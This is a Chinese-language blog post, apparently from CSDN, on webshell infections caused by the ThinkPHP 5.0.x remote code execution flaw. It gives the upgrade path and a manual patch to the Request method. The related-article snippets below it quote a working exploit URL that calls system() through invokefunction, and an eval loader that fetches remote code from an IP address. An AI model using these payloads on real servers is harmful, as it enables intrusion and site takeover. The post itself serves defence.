Thinkphp5.0.0~5.0.23版本远程代码执行漏洞导致网站被挂马

最新推荐文章于 2024-05-11 19:02:01 发布
最新推荐文章于 2024-05-11 19:02:01 发布
阅读量1.7k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37360803/article/details/104798118
版权

最近发现多个Thinkphp5开发的网站被挂马,导致首页被篡改,其他页面无法正常访问的情况。

木马中均包含以下代码:

define(‘Viv, bebegim.’,‘Denzel-你的英雄’);
经过检查,这些攻击是利用了Thinkphp5.0.0~5.0.23版本远程进行代码调用的漏洞进行的getshell。

漏洞的详细原理参见:https://seaii-blog.com/index.php/2019/01/14/88.html

Thinkphp5官方已经发布了安全更新版本:ThinkPHP5.0.24版本发布——安全更新

请各位使用到漏洞版本的开发人员尽快更新到5.0.24版本及以上。

如果不方便更新到最新版本,那么可以按照最新版本的Request类的method方法进行手动修复,具体如下:

打开/thinkphp/library/think/Request.php文件,找到method方法(约496行),修改下面代码:

$this->method = strtoupper($_POST[Config::get('var_method')]);
$this->{$this->method}($_POST);

改为:

$method = strtoupper($_POST[Config::get('var_method')]);
if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {
    $this->method = $method;
    $this->{$this->method}($_POST);
} else {
    $this->method = 'POST';
}
unset($_POST[Config::get('var_method')]);
啊哈条子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务器被入侵文件被加密,linux服务器被入侵
weixin_29545089的博客
08-09 731
下面是后门文件中的代码,谁给解释下都是啥意思?是用来获取我们盗取项目数据的吗?因字数限制,$str的加密负值没有写全error_reporting(E_ERROR);@ini_set('display_errors','Off');@ini_set('max_execution_time',20000);@ini_set('memory_limit','256M');header("content...
一场修复ThinkPHP框架的RCE漏洞的旷世大战
u011564144的博客
03-30 465
最近由于ThinkPHP5存在RCE漏洞 导致我的网站多次被篡改 存个档 留个记录 起因 我的插件商城有人反馈一直卡在主页 无法跳转 我直接回复了上一次的Git存档 网站恢复 没过多久 又出现了 经过排查 发现首页被加入特殊代码 已做转换处理 <title>&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#31934;&#20934;&#35745;&#21010;&
关于网站ThinkPHP网站被劫持问题“define(‘Viv, bebegim.‘,‘Denzel-你的英雄‘)”
一个点的博客
08-21 4189
近日网站了,首页被恶意篡改,浏览器进入跳转菠菜页面,而且只要一个网站,基本一个服务器都无法幸免,所以觉得这些人为了流量不择手段非常可恨,但当自己深入了解并执行了木文件之后,才发现,原来别人已经无比的宽容,手下留情,下面带大家看下那些的人是怎么手下留情的,让你知道下的危害与恐怖程度~~~废话不多说直接进入主题 一、文件 网站最主要的表现就是首页被修改,黑客通过篡改首页文件并判断进入页面方式,从而截取用户流量,如:直接输入网址进入,看到的是被篡改后的首页静态html页面.
齐博V系列如果发现被黑的排查方法附修复办法
半抹灯芯的博客
11-18 842
V系列如果你发现在搜索引擎收录是其他信息了 可以判断为被黑了。排查方法如下: /hack/cnzz/template/在这里增加了一个index.php可以直接把cnzz目录删除 这个插件已经失去作用。 /inc/job/这个目录有时候是增加一个文件 有时候是增加2个文件 一个文件是job.php 一个文件是ucserver.php有时候还会多一个cache文件 都删除即可。 inc 目录 有时候会有一个cache 文件和cache.php 删除即可 打开class.user.php...
ThinkPHP5.0.x远程执行漏洞分析与复现
最新发布
qq_74148743的博客
05-11 891
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程代码执行,进而获得服务器权限。
php主页劫持,基于 ThinkPHP5 的 cltphp 被搜索劫持,篡改首页的解决过程记录
weixin_34406909的博客
03-09 889
经过对比文件:1- 攻击者会写入与原文件名类似的文件, ,内容:function s(){$contents = file_get_contents('http://67.198.186.42:29808/s/admine21.txt');a($contents);}function a($conn){$b = '';eval($b.$conn.$b);}s();?>或者$b = '';wh...
php页面劫持网站,网站被劫持了怎么修复
weixin_35203943的博客
03-19 868
网站被劫持了的解决方法:首先用户可以对网站进行https改造,把空间的主机目录设置成禁止写入;然后对网站上的第三方软件进行检查,保证第三方软件不存在作弊的情况;最后关闭域名解析,在解析之后及时把域名删除。最近很多人遇到了网站被劫持了,那么网站被劫持了怎么修复?这可能也是众多站长比较头疼的一件事吧,下面我们就来讲解一下网站被劫持了修复方法。一:网站被劫持了是什么意思1.网站劫持从字面上来说,就是把用...
公司网站漏洞怎么解决
网站安全专家
01-18 3041
2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23thinkphp 5.0.22版本。 攻击者可以伪造远程恶意代码,对服务器进行po...
如何解决网站首页老被黑客篡改并被百度安全中心拦截提示 该页面存在木病毒的实战过程
热门推荐
网站安全专家
06-20 1万+
2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木病毒!网站在百度的收录与快照也被劫持成什么世界杯投注,以及博彩,赌博等等的内容,根据以上客户给我们反映的网站被黑的问题,我们Sine安全公司立即安排安全技术人员对客户网站被黑的情况进行了详细的网站安全检测与代码的人工安全审...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8279
ThinkPHP5系列远程代码执行漏洞复现(详细)
记录thinkPHP5.0后的处理
weixin_30480651的博客
01-19 850
一、thinkPHP5.0爆出getshell漏洞 http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo(); 二、通过升级thi...
织梦开发一些常用的小工具代码
一个点的博客
06-25 635
过滤富文本图片固定宽高,以自适应方式适应移动或PC端{dede:field.body runphp=yes} global $cfg_basehost; $str = @me; $search = '/(&lt;img.*?)width=(["\'])?.*?(?(2)\2|\s)([^&gt;]+&gt;)/is'; $search1 = '/(&lt;img.*?)height=(["\'])...
Thinkphp5.0--5.1 有重大安全隐患 用它做网站的赶紧改
kmdaliu的博客
09-25 489
ThinkPHP的主框架的装载器thinkphp/library/think/Loader.php文件中,第110行左右,有一段奇怪的代码,用于调用runtime/classmap.php。这段调用代码并非黑客所加,而是ThinkPHP框架自带的,我们下载了最新的ThinkPHP 5.1.24框架对比了,就是ThinkPHP自带的,至少从5.0就存在。目前尚不清楚是黑客是通过何种手段上传的。网站还能上传文件的一个组件是web编辑器,但web编辑器是需要登录后台的,没有登录后台,是无法上传文件的。
ThinkPHP 5.0 框架整站跳转菠菜()文件代码
二爷记
12-02 1135
ThinkPHP 是国内比较成熟,非常流行的php的web框架,免费开源,这些特性如同站长们最爱使用的织梦建站系统工具一样(dedecms)非常容易被,跳转菠菜网站!开源的特性意味着所...
Android 10.0 Settings源码分析之主界面加载(一)
Otaku_627的博客
09-22 6050
本篇主要记录AndroidQ Settings源码主界面加载流程,方便后续工作调试其流程。由于篇幅较长,本篇主要记录主界面xml静态加载。 代码路径: packages/app/Settings/ 主界面加载: 从清单文件AndroidManifest.xml中入手: <!-- Alias for launcher activity only, as this belongs to each profile. --> <activity-alias andr
记一次清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木
weixin_30662109的博客
12-25 385
昨天发现 一台服务器突然慢了top显示几个进程100%以上的cpu使用 执行命令为 : /tmp/php -s /tmp/p2.conf 基本可以确定是被了 下一步确定来源 last 没有登陆记录 先干掉这几个进程,但是几分钟之后又出现了 先看看这个木想干什么吧 netstat看到这个木开启了一个端口和国外的某个ip建立了连接 但是tcpdump了一小会儿 ...
tp5被恶意篡改?项目被增加位置文件?
irose的博客
07-07 1159
1.最重要的是把当前项目删掉,使用备份(因为你不知道它在你的哪个文件夹插入木文件,最直接就是删掉) 2.然后开始做一下操作 3.可以更新框架版本 4.禁掉高危险函数:eval、phpinfo 这2个函数必须禁掉! (1)、需禁用的函数名,如下: phpinfo、eval、passthru、exec、system、chroot、scandir、chgrp、chown、shell_exec、proc_open、proc_get_status、ini_alter、ini_restore、dl、pfsockope
记录一次基于ThinkPHP网站被入侵到溯源的过程
DYBOY-程序开发&网络安全
02-18 2701
昨天晚上,正准备入睡,朋友突然发消息说他的网站被黑客攻击了,首页内容被篡改,于是我开始了紧急的修复工作 知道这个情况后,立即翻身起来,让朋友发给我必要的信息,把网站的日志下载到本地,因为网站本身的访问量不是很大,所以直接使用 notepad++ 来手动分析。 0x01 下载必要文件 首先将日志文件、现在网站空间的源码以及之前的网站备份下载到本地,这一步是为了比较分析。 0x02 日志分析 从网...
thinkphp 5.0 index.php被替换成首页内容,被注入恶意代码
weixin_34019929的博客
03-11 3358
原TP项目是5.0.10,近日,在登录后台时,域名/admin,跳转到网站首页。无法进入后台登录页面。然后发现,public/index.php竟然被改了。 先升级到5.0.24。还是被中枪。 后来领导查看了nginx日志。日志在 /home/wwwlogs/域名.log 发现了某个上传图片的目录下,竟然有.php文件。 192.168.100.1 - - [06/Mar/2019:14:16:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值